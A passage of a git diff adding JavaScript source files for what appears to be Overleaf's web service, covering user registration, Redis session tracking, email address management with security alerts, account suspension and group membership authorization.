+ for (const provider in providers) { + const data = providers[provider] + data.description = req.i18n.translate( + data.descriptionKey, + Object.assign({}, data.descriptionOptions) + ) + result[provider] = data + } + } + return result + }, +} + +export default UserPagesController diff --git a/services/web/app/src/Features/User/UserPostRegistrationAnalyticsManager.js b/services/web/app/src/Features/User/UserPostRegistrationAnalyticsManager.js new file mode 100644 index 0000000..26dbf86 --- /dev/null +++ b/services/web/app/src/Features/User/UserPostRegistrationAnalyticsManager.js @@ -0,0 +1,46 @@ +const Queues = require('../../infrastructure/Queues') +const UserGetter = require('./UserGetter') +const { + promises: InstitutionsAPIPromises, +} = require('../Institutions/InstitutionsAPI') +const AnalyticsManager = require('../Analytics/AnalyticsManager') + +const ONE_DAY_MS = 24 * 60 * 60 * 1000 + +async function schedulePostRegistrationAnalytics(user) { + await Queues.createScheduledJob( + 'post-registration-analytics', + { data: { userId: user._id } }, + ONE_DAY_MS + ) +} + +async function postRegistrationAnalytics(userId) { + const user = await UserGetter.promises.getUser({ _id: userId }, { email: 1 }) + if (!user) { + return + } + await checkAffiliations(userId) +} + +async function checkAffiliations(userId) { + const affiliationsData = + await InstitutionsAPIPromises.getUserAffiliations(userId) + const hasCommonsAccountAffiliation = affiliationsData.some( + affiliationData => + affiliationData.institution && affiliationData.institution.commonsAccount + ) + + if (hasCommonsAccountAffiliation) { + await 
AnalyticsManager.setUserPropertyForUser( + userId, + 'registered-from-commons-account', + true + ) + } +} + +module.exports = { + schedulePostRegistrationAnalytics, + postRegistrationAnalytics, +} diff --git a/services/web/app/src/Features/User/UserPrimaryEmailCheckHandler.js b/services/web/app/src/Features/User/UserPrimaryEmailCheckHandler.js new file mode 100644 index 0000000..be1d045 --- /dev/null +++ b/services/web/app/src/Features/User/UserPrimaryEmailCheckHandler.js @@ -0,0 +1,33 @@ +const Settings = require('@overleaf/settings') + +function requiresPrimaryEmailCheck({ + email, + emails, + lastPrimaryEmailCheck, + signUpDate, +}) { + const hasExpired = date => { + if (!date) { + return true + } + return Date.now() - date.getTime() > Settings.primary_email_check_expiration + } + + const primaryEmailConfirmedAt = emails.find( + emailEntry => emailEntry.email === email + ).confirmedAt + + if (primaryEmailConfirmedAt && !hasExpired(primaryEmailConfirmedAt)) { + return false + } + + if (lastPrimaryEmailCheck) { + return hasExpired(lastPrimaryEmailCheck) + } else { + return hasExpired(signUpDate) + } +} + +module.exports = { + requiresPrimaryEmailCheck, +} diff --git a/services/web/app/src/Features/User/UserRegistrationHandler.js b/services/web/app/src/Features/User/UserRegistrationHandler.js new file mode 100644 index 0000000..02c52f7 --- /dev/null +++ b/services/web/app/src/Features/User/UserRegistrationHandler.js @@ -0,0 +1,136 @@ +const { User } = require('../../models/User') +const UserCreator = require('./UserCreator') +const UserGetter = require('./UserGetter') +const AuthenticationManager = require('../Authentication/AuthenticationManager') +const NewsletterManager = require('../Newsletter/NewsletterManager') +const logger = require('@overleaf/logger') +const crypto = require('crypto') +const EmailHandler = require('../Email/EmailHandler') +const OneTimeTokenHandler = require('../Security/OneTimeTokenHandler') +const settings = require('@overleaf/settings') +const EmailHelper = require('../Helpers/EmailHelper') +const { + callbackify, + callbackifyMultiResult, +} = require('@overleaf/promise-utils') +const OError = require('@overleaf/o-error') + +const UserRegistrationHandler = { + _registrationRequestIsValid(body) { + const invalidEmail = AuthenticationManager.validateEmail(body.email || '') + const invalidPassword = AuthenticationManager.validatePassword( + body.password || '', + body.email + ) + return !(invalidEmail || invalidPassword) + }, + + async _createNewUserIfRequired(user, userDetails) { + if (!user) { + userDetails.holdingAccount = false + return await UserCreator.promises.createNewUser( + { + holdingAccount: false, + email: userDetails.email, + first_name: userDetails.first_name, + last_name: userDetails.last_name, + analyticsId: userDetails.analyticsId, + }, + {} + ) + } + return user + }, + + async registerNewUser(userDetails) { + const requestIsValid = + UserRegistrationHandler._registrationRequestIsValid(userDetails) + + if (!requestIsValid) { + throw new Error('request is not valid') + } + userDetails.email = EmailHelper.parseEmail(userDetails.email) + + let user = await UserGetter.promises.getUserByAnyEmail(userDetails.email) + if (user && user.holdingAccount === false) { + // We add userId to the error object so that the calling function can access + // the id of the already existing user account. 
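+    // A minimal caller-side sketch (illustrative only, assuming the standard
+    // @overleaf/o-error info accessors):
+    //
+    //   try {
+    //     await UserRegistrationHandler.promises.registerNewUser(details)
+    //   } catch (err) {
+    //     if (err.message === 'EmailAlreadyRegistered') {
+    //       const existingUserId = OError.getFullInfo(err).userId
+    //     }
+    //   }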
+ throw new OError('EmailAlreadyRegistered', { userId: user._id }) + } + + user = await UserRegistrationHandler._createNewUserIfRequired( + user, + userDetails + ) + + await User.updateOne( + { _id: user._id }, + { $set: { holdingAccount: false } } + ).exec() + + await AuthenticationManager.promises.setUserPassword( + user, + userDetails.password + ) + + if (userDetails.subscribeToNewsletter === 'true') { + try { + NewsletterManager.subscribe(user) + } catch (error) { + logger.warn( + { err: error, user }, + 'Failed to subscribe user to newsletter' + ) + throw error + } + } + + return user + }, + + async registerNewUserAndSendActivationEmail(email) { + let user + try { + user = await UserRegistrationHandler.registerNewUser({ + email, + password: crypto.randomBytes(32).toString('hex'), + }) + } catch (error) { + if (error.message === 'EmailAlreadyRegistered') { + logger.debug({ email }, 'user already exists, resending welcome email') + user = await UserGetter.promises.getUserByAnyEmail(email) + } else { + throw error + } + } + + const ONE_WEEK = 7 * 24 * 60 * 60 // seconds + const token = await OneTimeTokenHandler.promises.getNewToken( + 'password', + { user_id: user._id.toString(), email: user.email }, + { expiresIn: ONE_WEEK } + ) + + const setNewPasswordUrl = `${settings.siteUrl}/user/activate?token=${token}&user_id=${user._id}` + + await EmailHandler.promises + .sendEmail('registered', { + to: user.email, + setNewPasswordUrl, + }) + .catch(error => { + logger.warn({ err: error }, 'failed to send activation email') + }) + + return { user, setNewPasswordUrl } + }, +} + +module.exports = { + registerNewUser: callbackify(UserRegistrationHandler.registerNewUser), + registerNewUserAndSendActivationEmail: callbackifyMultiResult( + UserRegistrationHandler.registerNewUserAndSendActivationEmail, + ['user', 'setNewPasswordUrl'] + ), + promises: UserRegistrationHandler, +} diff --git a/services/web/app/src/Features/User/UserSessionsManager.js b/services/web/app/src/Features/User/UserSessionsManager.js new file mode 100644 index 0000000..d4f7eb7 --- /dev/null +++ b/services/web/app/src/Features/User/UserSessionsManager.js @@ -0,0 +1,258 @@ +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Async = require('async') +const _ = require('lodash') +const { promisify } = require('util') +const UserSessionsRedis = require('./UserSessionsRedis') +const rclient = UserSessionsRedis.client() + +const UserSessionsManager = { + // mimic the key used by the express sessions + _sessionKey(sessionId) { + return `sess:${sessionId}` + }, + + trackSession(user, sessionId, callback) { + if (!user) { + return callback(null) + } + if (!sessionId) { + return callback(null) + } + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + const value = UserSessionsManager._sessionKey(sessionId) + rclient + .multi() + .sadd(sessionSetKey, value) + .pexpire(sessionSetKey, `${Settings.cookieSessionLength}`) // in milliseconds + .exec(function (err, response) { + if (err) { + OError.tag( + err, + 'error while adding session key to UserSessions set', + { + user_id: user._id, + sessionSetKey, + } + ) + return callback(err) + } + UserSessionsManager._checkSessions(user, function () {}) + callback() + }) + }, + + untrackSession(user, sessionId, callback) { + if (!callback) { + callback = function () {} + } + if (!user) { + return callback(null) + } + if (!sessionId) { + return callback(null) + } + const sessionSetKey = 
UserSessionsRedis.sessionSetKey(user) + const value = UserSessionsManager._sessionKey(sessionId) + rclient + .multi() + .srem(sessionSetKey, value) + .pexpire(sessionSetKey, `${Settings.cookieSessionLength}`) // in milliseconds + .exec(function (err, response) { + if (err) { + OError.tag( + err, + 'error while removing session key from UserSessions set', + { + user_id: user._id, + sessionSetKey, + } + ) + return callback(err) + } + UserSessionsManager._checkSessions(user, function () {}) + callback() + }) + }, + + getAllUserSessions(user, exclude, callback) { + exclude = _.map(exclude, UserSessionsManager._sessionKey) + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + rclient.smembers(sessionSetKey, function (err, sessionKeys) { + if (err) { + OError.tag(err, 'error getting all session keys for user from redis', { + user_id: user._id, + }) + return callback(err) + } + sessionKeys = _.filter(sessionKeys, k => !_.includes(exclude, k)) + if (sessionKeys.length === 0) { + logger.debug({ userId: user._id }, 'no other sessions found, returning') + return callback(null, []) + } + + Async.mapSeries( + sessionKeys, + (k, cb) => rclient.get(k, cb), + function (err, sessions) { + if (err) { + OError.tag(err, 'error getting all sessions for user from redis', { + user_id: user._id, + }) + return callback(err) + } + + const result = [] + for (let session of Array.from(sessions)) { + if (!session) { + continue + } + session = JSON.parse(session) + let sessionUser = session.passport && session.passport.user + if (!sessionUser) { + sessionUser = session.user + } + + result.push({ + ip_address: sessionUser.ip_address, + session_created: sessionUser.session_created, + }) + } + + callback(null, result) + } + ) + }) + }, + + /** + * @param {{_id: string}} user + * @param {string | null | undefined} retainSessionID - the session ID to exclude from deletion + * @param {(err: Error | null, data?: unknown) => void} callback + */ + removeSessionsFromRedis(user, retainSessionID, callback) { + if (!user) { + return callback( + new Error('bug: user not passed to removeSessionsFromRedis') + ) + } + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + rclient.smembers(sessionSetKey, function (err, sessionKeys) { + if (err) { + OError.tag(err, 'error getting contents of UserSessions set', { + user_id: user._id, + sessionSetKey, + }) + return callback(err) + } + const keysToDelete = retainSessionID + ? 
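+      // (worked example, keys invented: sessionKeys ['sess:a', 'sess:b',
+      // 'sess:c'] with retainSessionID 'b' leaves ['sess:a', 'sess:c'] to
+      // delete, because _sessionKey('b') === 'sess:b')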
_.without( + sessionKeys, + UserSessionsManager._sessionKey(retainSessionID) + ) + : sessionKeys + if (keysToDelete.length === 0) { + logger.debug( + { userId: user._id }, + 'no sessions in UserSessions set to delete, returning' + ) + return callback(null, 0) + } + logger.debug( + { userId: user._id, count: keysToDelete.length }, + 'deleting sessions for user' + ) + + const deletions = keysToDelete.map(k => cb => rclient.del(k, cb)) + + Async.series(deletions, function (err, _result) { + if (err) { + OError.tag(err, 'error revoking all sessions for user', { + user_id: user._id, + sessionSetKey, + }) + return callback(err) + } + rclient.srem(sessionSetKey, keysToDelete, function (err) { + if (err) { + OError.tag(err, 'error removing session set for user', { + user_id: user._id, + sessionSetKey, + }) + return callback(err) + } + callback(null, keysToDelete.length) + }) + }) + }) + }, + + touch(user, callback) { + if (!user) { + return callback(null) + } + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + rclient.pexpire( + sessionSetKey, + `${Settings.cookieSessionLength}`, // in milliseconds + function (err, response) { + if (err) { + OError.tag(err, 'error while updating ttl on UserSessions set', { + user_id: user._id, + }) + return callback(err) + } + callback(null) + } + ) + }, + + _checkSessions(user, callback) { + if (!user) { + return callback(null) + } + const sessionSetKey = UserSessionsRedis.sessionSetKey(user) + rclient.smembers(sessionSetKey, function (err, sessionKeys) { + if (err) { + OError.tag(err, 'error getting contents of UserSessions set', { + user_id: user._id, + sessionSetKey, + }) + return callback(err) + } + Async.series( + sessionKeys.map( + key => next => + rclient.get(key, function (err, val) { + if (err) { + return next(err) + } + if (!val) { + rclient.srem(sessionSetKey, key, function (err, result) { + return next(err) + }) + } else { + next() + } + }) + ), + function (err, results) { + callback(err) + } + ) + }) + }, +} + +UserSessionsManager.promises = { + getAllUserSessions: promisify(UserSessionsManager.getAllUserSessions), + removeSessionsFromRedis: (user, retainSessionID = null) => + promisify(UserSessionsManager.removeSessionsFromRedis)( + user, + retainSessionID + ), + untrackSession: promisify(UserSessionsManager.untrackSession), +} + +module.exports = UserSessionsManager diff --git a/services/web/app/src/Features/User/UserSessionsRedis.js b/services/web/app/src/Features/User/UserSessionsRedis.js new file mode 100644 index 0000000..689e414 --- /dev/null +++ b/services/web/app/src/Features/User/UserSessionsRedis.js @@ -0,0 +1,13 @@ +const RedisWrapper = require('../../infrastructure/RedisWrapper') +const rclient = RedisWrapper.client('websessions') + +const UserSessionsRedis = { + client() { + return rclient + }, + + sessionSetKey(user) { + return `UserSessions:{${user._id}}` + }, +} +module.exports = UserSessionsRedis diff --git a/services/web/app/src/Features/User/UserUpdater.js b/services/web/app/src/Features/User/UserUpdater.js new file mode 100644 index 0000000..627e738 --- /dev/null +++ b/services/web/app/src/Features/User/UserUpdater.js @@ -0,0 +1,620 @@ +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { db } = require('../../infrastructure/mongodb') +const { normalizeQuery } = require('../Helpers/Mongo') +const { callbackify } = require('util') +const UserGetter = require('./UserGetter') +const InstitutionsAPI = require('../Institutions/InstitutionsAPI') +const Features = 
require('../../infrastructure/Features')
+const FeaturesUpdater = require('../Subscription/FeaturesUpdater')
+const EmailHandler = require('../Email/EmailHandler')
+const EmailHelper = require('../Helpers/EmailHelper')
+const Errors = require('../Errors/Errors')
+const NewsletterManager = require('../Newsletter/NewsletterManager')
+const RecurlyWrapper = require('../Subscription/RecurlyWrapper')
+const UserAuditLogHandler = require('./UserAuditLogHandler')
+const AnalyticsManager = require('../Analytics/AnalyticsManager')
+const SubscriptionLocator = require('../Subscription/SubscriptionLocator')
+const NotificationsBuilder = require('../Notifications/NotificationsBuilder')
+const _ = require('lodash')
+const Modules = require('../../infrastructure/Modules')
+const UserSessionsManager = require('./UserSessionsManager')
+
+async function _sendSecurityAlertPrimaryEmailChanged(
+  userId,
+  oldEmail,
+  email,
+  deleteOldEmail
+) {
+  // Send email to the following:
+  // - the old primary
+  // - the new primary
+  // - for all other current (confirmed or recently-enough reconfirmed) email addresses, group by institution if we
+  //   have it, or domain if we don’t, and for each group send to the most recently reconfirmed (or confirmed if never
+  //   reconfirmed) address in that group.
+  // See #6101.
+  const emailOptions = {
+    actionDescribed: `the primary email address on your account was changed to ${email}`,
+    action: 'change of primary email address',
+    message: deleteOldEmail
+      ? [
+          `We also removed the previous primary email ${oldEmail} from the account.`,
+        ]
+      : [],
+  }
+
+  async function sendToRecipients(recipients) {
+    // On failure, log the error and carry on so that one email failing does not prevent other emails sending
+    for await (const recipient of recipients) {
+      try {
+        const opts = Object.assign({}, emailOptions, { to: recipient })
+        await EmailHandler.promises.sendEmail('securityAlert', opts)
+      } catch (error) {
+        logger.error(
+          { error, userId },
+          'could not send security alert email when primary email changed'
+        )
+      }
+    }
+  }
+
+  // First, send notification to the old and new primary emails before getting other emails from v1 to ensure that these
+  // are still sent in the event of not being able to reach v1
+  const oldAndNewPrimaryEmails = [oldEmail, email]
+  await sendToRecipients(oldAndNewPrimaryEmails)
+
+  // Next, get extra recipients with affiliation data
+  const emailsData = await UserGetter.promises.getUserFullEmails(userId)
+  const extraRecipients = _securityAlertPrimaryEmailChangedExtraRecipients(
+    emailsData,
+    oldEmail,
+    email
+  )
+
+  await sendToRecipients(extraRecipients)
+}
+
+/**
+ * Add a new email address for the user. 
Email cannot be already used by this + * or any other user + */ +async function addEmailAddress(userId, newEmail, affiliationOptions, auditLog) { + newEmail = EmailHelper.parseEmail(newEmail) + if (!newEmail) { + throw new Error('invalid email') + } + + await UserGetter.promises.ensureUniqueEmailAddress(newEmail) + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'secondary-email-added' + ) + + await UserAuditLogHandler.promises.addEntry( + userId, + 'add-email', + auditLog.initiatorId, + auditLog.ipAddress, + { + newSecondaryEmail: newEmail, + } + ) + + try { + await InstitutionsAPI.promises.addAffiliation( + userId, + newEmail, + affiliationOptions + ) + } catch (error) { + throw OError.tag(error, 'problem adding affiliation while adding email') + } + + try { + const reversedHostname = newEmail.split('@')[1].split('').reverse().join('') + const update = { + $push: { + emails: { email: newEmail, createdAt: new Date(), reversedHostname }, + }, + } + await updateUser({ _id: userId, 'emails.email': { $ne: newEmail } }, update) + } catch (error) { + throw OError.tag(error, 'problem updating users emails') + } +} + +async function clearSAMLData(userId, auditLog, sendEmail) { + const user = await UserGetter.promises.getUser(userId, { + email: 1, + emails: 1, + }) + + await UserAuditLogHandler.promises.addEntry( + userId, + 'clear-institution-sso-data', + auditLog.initiatorId, + auditLog.ipAddress, + {} + ) + + const update = { + $unset: { + samlIdentifiers: 1, + 'emails.$[].samlProviderId': 1, + 'enrollment.sso': 1, + }, + } + + await updateUser(userId, update) + + for (const emailData of user.emails) { + await InstitutionsAPI.promises.removeEntitlement(userId, emailData.email) + } + + await FeaturesUpdater.promises.refreshFeatures( + userId, + 'clear-institution-sso-data' + ) + + if (sendEmail) { + await EmailHandler.promises.sendEmail('SAMLDataCleared', { to: user.email }) + } +} + +/** + * set the default email address by setting the `email` attribute. 
The email + * must be one of the user's multiple emails (`emails` attribute) + */ +async function setDefaultEmailAddress( + userId, + email, + allowUnconfirmed, + auditLog, + sendSecurityAlert, + deleteOldEmail = false +) { + email = EmailHelper.parseEmail(email) + if (email == null) { + throw new Error('invalid email') + } + + const user = await UserGetter.promises.getUser(userId, { + email: 1, + emails: 1, + }) + if (!user) { + throw new Error('invalid userId') + } + + const oldEmail = user.email + const userEmail = user.emails.find(e => e.email === email) + if (!userEmail) { + throw new Error('Default email does not belong to user') + } + if (!userEmail.confirmedAt && !allowUnconfirmed) { + throw new Errors.UnconfirmedEmailError() + } + + await UserAuditLogHandler.promises.addEntry( + userId, + 'change-primary-email', + auditLog.initiatorId, + auditLog.ipAddress, + { + newPrimaryEmail: email, + oldPrimaryEmail: oldEmail, + } + ) + + const query = { _id: userId, 'emails.email': email } + const update = { $set: { email, lastPrimaryEmailCheck: new Date() } } + const res = await updateUser(query, update) + + // this should not happen + if (res.matchedCount !== 1) { + throw new Error('email update error') + } + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'primary-email-address-updated' + ) + + if (sendSecurityAlert) { + // no need to wait, errors are logged and not passed back + _sendSecurityAlertPrimaryEmailChanged( + userId, + oldEmail, + email, + deleteOldEmail + ).catch(err => { + logger.error({ err }, 'failed to send security alert email') + }) + } + + try { + await NewsletterManager.promises.changeEmail(user, email) + } catch (error) { + logger.warn( + { err: error, oldEmail, newEmail: email }, + 'Failed to change email in newsletter subscription' + ) + } + try { + await Modules.promises.hooks.fire('userEmailChanged', user, email) + } catch (err) { + logger.error( + { err, oldEmail, newEmail: email }, + 'Failed to fire "userEmailChanged" hook' + ) + } + + try { + await RecurlyWrapper.promises.updateAccountEmailAddress(user._id, email) + } catch (error) { + // errors are ignored + } +} + +/** + * Overwrites the primary email address of a user in the database in-place. + * This function is only intended for use in scripts to migrate email addresses + * where we do not want to trigger all the actions that happen when a user + * changes their own email. It should not be used in any other circumstances. 
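+ *
+ * A usage sketch for script authors (identifiers illustrative):
+ *
+ *   await UserUpdater.promises.migrateDefaultEmailAddress(
+ *     userId,
+ *     'old@example.com',
+ *     'new@example.com',
+ *     { initiatorId: scriptAdminId, ipAddress: '127.0.0.1' }
+ *   )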
+ */ +async function migrateDefaultEmailAddress( + userId, + oldEmail, + newEmail, + auditLog +) { + oldEmail = EmailHelper.parseEmail(oldEmail) + if (oldEmail == null) { + throw new Error('invalid old email') + } + newEmail = EmailHelper.parseEmail(newEmail) + if (newEmail == null) { + throw new Error('invalid new email') + } + const reversedHostname = newEmail.split('@')[1].split('').reverse().join('') + const query = { + _id: userId, + email: oldEmail, + 'emails.email': oldEmail, + } + const update = { + $set: { + email: newEmail, + 'emails.$.email': newEmail, + 'emails.$.reversedHostname': reversedHostname, + }, + } + const result = await updateUser(query, update) + if (result.modifiedCount !== 1) { + throw new Error('email update error') + } + // add a user audit log entry for the email change + await UserAuditLogHandler.promises.addEntry( + userId, + 'migrate-default-email', + auditLog.initiatorId, + auditLog.ipAddress, + { + oldEmail, + newEmail, + // Add optional extra info + ...(auditLog.extraInfo || {}), + } + ) +} + +async function confirmEmail(userId, email, affiliationOptions) { + // used for initial email confirmation (non-SSO and SSO) + // also used for reconfirmation of non-SSO emails + const confirmedAt = new Date() + email = EmailHelper.parseEmail(email) + if (email == null) { + throw new Error('invalid email') + } + logger.debug({ userId, email }, 'confirming user email') + + try { + affiliationOptions = affiliationOptions || {} + affiliationOptions.confirmedAt = confirmedAt + await InstitutionsAPI.promises.addAffiliation( + userId, + email, + affiliationOptions + ) + } catch (error) { + throw OError.tag(error, 'problem adding affiliation while confirming email') + } + + const query = { + _id: userId, + 'emails.email': email, + } + + // only update confirmedAt if it was not previously set + const update = { + $set: { + 'emails.$.reconfirmedAt': confirmedAt, + }, + $min: { + 'emails.$.confirmedAt': confirmedAt, + }, + } + + if (Features.hasFeature('affiliations')) { + update.$unset = { + 'emails.$.affiliationUnchecked': 1, + } + } + + const res = await updateUser(query, update) + + if (res.matchedCount !== 1) { + throw new Errors.NotFoundError('user id and email do no match') + } + await FeaturesUpdater.promises.refreshFeatures(userId, 'confirm-email') + try { + await maybeCreateRedundantSubscriptionNotification(userId, email) + } catch (error) { + logger.err( + { err: error }, + 'error checking redundant subscription on email confirmation' + ) + } +} + +async function maybeCreateRedundantSubscriptionNotification(userId, email) { + const subscription = + await SubscriptionLocator.promises.getUserIndividualSubscription(userId) + if (!subscription || subscription.groupPlan) { + return + } + + const affiliations = + await InstitutionsAPI.promises.getUserAffiliations(userId) + const confirmedAffiliation = affiliations.find(a => a.email === email) + if (!confirmedAffiliation || confirmedAffiliation.licence === 'free') { + return + } + + await NotificationsBuilder.promises + .redundantPersonalSubscription( + { + institutionId: confirmedAffiliation.institution.id, + institutionName: confirmedAffiliation.institution.name, + }, + { _id: userId } + ) + .create() +} + +async function removeEmailAddress( + userId, + email, + auditLog, + skipParseEmail = false +) { + // remove one of the user's email addresses. 
The email cannot be the user's + // default email address + if (!skipParseEmail) { + email = EmailHelper.parseEmail(email) + } else if (skipParseEmail && typeof email !== 'string') { + throw new Error('email must be a string') + } + + if (!email) { + throw new Error('invalid email') + } + + const isMainEmail = await UserGetter.promises.getUserByMainEmail(email, { + _id: 1, + }) + if (isMainEmail) { + throw new Error('cannot remove primary email') + } + + await UserAuditLogHandler.promises.addEntry( + userId, + 'remove-email', + auditLog.initiatorId, + auditLog.ipAddress, + { + removedEmail: email, + // Add optional extra info + ...(auditLog.extraInfo || {}), + } + ) + + try { + await InstitutionsAPI.promises.removeAffiliation(userId, email) + } catch (error) { + OError.tag(error, 'problem removing affiliation') + throw error + } + + const query = { _id: userId, email: { $ne: email } } + const update = { $pull: { emails: { email } } } + + let res + try { + res = await updateUser(query, update) + } catch (error) { + OError.tag(error, 'problem removing users email') + throw error + } + + if (res.matchedCount !== 1) { + throw new Error('Cannot remove email') + } + + await FeaturesUpdater.promises.refreshFeatures(userId, 'remove-email') +} + +async function addAffiliationForNewUser( + userId, + email, + affiliationOptions = {} +) { + await InstitutionsAPI.promises.addAffiliation( + userId, + email, + affiliationOptions + ) + try { + await updateUser( + { _id: userId, 'emails.email': email }, + { $unset: { 'emails.$.affiliationUnchecked': 1 } } + ) + } catch (error) { + logger.error( + OError.tag( + error, + 'could not remove affiliationUnchecked flag for user on create', + { + userId, + email, + } + ) + ) + } +} + +async function updateUser(query, update) { + query = normalizeQuery(query) + const result = await db.users.updateOne(query, update) + return result +} + +/** + * DEPRECATED + * + * Change the user's main email address by adding a new email, switching the + * default email and removing the old email. 
Prefer manipulating multiple + * emails and the default rather than calling this method directly + */ +async function changeEmailAddress(userId, newEmail, auditLog) { + newEmail = EmailHelper.parseEmail(newEmail) + if (newEmail == null) { + throw new Error('invalid email') + } + + const oldEmail = await UserGetter.promises.getUserEmail(userId) + await addEmailAddress(userId, newEmail, {}, auditLog) + await setDefaultEmailAddress(userId, newEmail, true, auditLog, true) + await removeEmailAddress(userId, oldEmail, auditLog) +} + +/** + * @param {string} userId + * @param {{initiatorId: string, ip: string}} auditLog + * @returns {Promise<void>} + */ +async function removeReconfirmFlag(userId, auditLog) { + await UserAuditLogHandler.promises.addEntry( + userId.toString(), + 'must-reset-password-unset', + auditLog.initiatorId, + auditLog.ip + ) + await updateUser(userId.toString(), { $set: { must_reconfirm: false } }) +} + +async function suspendUser(userId, auditLog = {}) { + const res = await updateUser( + { _id: userId, suspended: { $ne: true } }, + { $set: { suspended: true } } + ) + if (res.matchedCount !== 1) { + throw new Errors.NotFoundError('user id not found or already suspended') + } + await UserAuditLogHandler.promises.addEntry( + userId, + 'account-suspension', + auditLog.initiatorId, + auditLog.ip, + auditLog.info || {} + ) + await UserSessionsManager.promises.removeSessionsFromRedis({ _id: userId }) + await Modules.promises.hooks.fire( + 'removeDropbox', + userId, + 'account-suspension' + ) +} + +function _securityAlertPrimaryEmailChangedExtraRecipients( + emailsData, + oldEmail, + email +) { + // Group by institution if we have it, or domain if we don’t, and for each group send to the most recently + // reconfirmed (or confirmed if never reconfirmed) address in that group. We also remove the original and new + // primary email addresses because they are emailed separately + // See #6101. + function sortEmailsByConfirmation(emails) { + return emails.sort((e1, e2) => e2.lastConfirmedAt - e1.lastConfirmedAt) + } + + const recipients = new Set() + const emailsToIgnore = new Set([oldEmail, email]) + + // Remove non-confirmed emails + const confirmedEmails = emailsData.filter(email => !!email.lastConfirmedAt) + + // Group other emails by institution, separating out those with no institution and grouping them instead by domain. 
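+  // (worked example, addresses invented: alice@econ.uni.edu affiliated with
+  // institution 42 groups under 'institution_id:42', while bob@gmail.com
+  // with no affiliation groups under 'domain:gmail.com')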
+ // The keys for each group are not used for anything other than the grouping, so can have a slightly paranoid format + // to avoid any potential clash + const groupedEmails = _.groupBy(confirmedEmails, emailData => { + if (!emailData.affiliation || !emailData.affiliation.institution) { + return `domain:${EmailHelper.getDomain(emailData.email)}` + } + return `institution_id:${emailData.affiliation.institution.id}` + }) + + // For each group of emails, order the emails by (re-)confirmation date and pick the first + for (const emails of Object.values(groupedEmails)) { + // Sort by confirmation and pick the first + sortEmailsByConfirmation(emails) + + // Ignore original and new primary email addresses + const recipient = emails[0].email + if (!emailsToIgnore.has(recipient)) { + recipients.add(emails[0].email) + } + } + + return Array.from(recipients) +} + +module.exports = { + addAffiliationForNewUser: callbackify(addAffiliationForNewUser), + addEmailAddress: callbackify(addEmailAddress), + changeEmailAddress: callbackify(changeEmailAddress), + clearSAMLData: callbackify(clearSAMLData), + confirmEmail: callbackify(confirmEmail), + removeEmailAddress: callbackify(removeEmailAddress), + removeReconfirmFlag: callbackify(removeReconfirmFlag), + setDefaultEmailAddress: callbackify(setDefaultEmailAddress), + migrateDefaultEmailAddress: callbackify(migrateDefaultEmailAddress), + updateUser: callbackify(updateUser), + suspendUser: callbackify(suspendUser), + promises: { + addAffiliationForNewUser, + addEmailAddress, + changeEmailAddress, + clearSAMLData, + confirmEmail, + removeEmailAddress, + removeReconfirmFlag, + setDefaultEmailAddress, + migrateDefaultEmailAddress, + updateUser, + suspendUser, + }, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipAuthorization.js b/services/web/app/src/Features/UserMembership/UserMembershipAuthorization.js new file mode 100644 index 0000000..a7f25c1 --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipAuthorization.js @@ -0,0 +1,30 @@ +const UserMembershipAuthorization = { + hasStaffAccess(requiredStaffAccess) { + return req => { + if (!req.user) { + return false + } + return ( + requiredStaffAccess && + req.user.staffAccess && + req.user.staffAccess[requiredStaffAccess] + ) + } + }, + + hasEntityAccess() { + return req => { + if (!req.entity) { + return false + } + const fieldAccess = req.entity[req.entityConfig.fields.access] + const fieldAccessArray = Array.isArray(fieldAccess) + ? 
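+      // (shape note: the configured access field may hold a single id, as
+      // with admin_id, or an array, as with manager_ids; either way the
+      // check below compares members by their string id)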
fieldAccess + : [fieldAccess.toString()] + return fieldAccessArray.some( + accessUserId => accessUserId.toString() === req.user._id.toString() + ) + } + }, +} +module.exports = UserMembershipAuthorization diff --git a/services/web/app/src/Features/UserMembership/UserMembershipController.mjs b/services/web/app/src/Features/UserMembership/UserMembershipController.mjs new file mode 100644 index 0000000..aaa8fa5 --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipController.mjs @@ -0,0 +1,244 @@ +import SessionManager from '../Authentication/SessionManager.js' +import UserMembershipHandler from './UserMembershipHandler.js' +import Errors from '../Errors/Errors.js' +import EmailHelper from '../Helpers/EmailHelper.js' +import { csvAttachment } from '../../infrastructure/Response.js' +import { + UserIsManagerError, + UserAlreadyAddedError, + UserNotFoundError, +} from './UserMembershipErrors.js' +import { SSOConfig } from '../../models/SSOConfig.js' +import { Parser as CSVParser } from 'json2csv' +import { expressify } from '@overleaf/promise-utils' +import PlansLocator from '../Subscription/PlansLocator.js' +import RecurlyClient from '../Subscription/RecurlyClient.js' + +async function manageGroupMembers(req, res, next) { + const { entity: subscription, entityConfig } = req + + const entityPrimaryKey = + subscription[entityConfig.fields.primaryKey].toString() + + let entityName + if (entityConfig.fields.name) { + entityName = subscription[entityConfig.fields.name] + } + + const users = await UserMembershipHandler.promises.getUsers( + subscription, + entityConfig + ) + const ssoConfig = await SSOConfig.findById(subscription.ssoConfig).exec() + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + const userId = SessionManager.getLoggedInUserId(req.session) + const isAdmin = subscription.admin_id.toString() === userId + const recurlySubscription = subscription.recurlySubscription_id + ? 
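+    // (reading note: the Recurly lookup is skipped for groups without a
+    // recurlySubscription_id, so canUseAddSeatsFeature below can only be
+    // true for an admin on an active flexible-licensing Recurly plan with
+    // no pending change)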
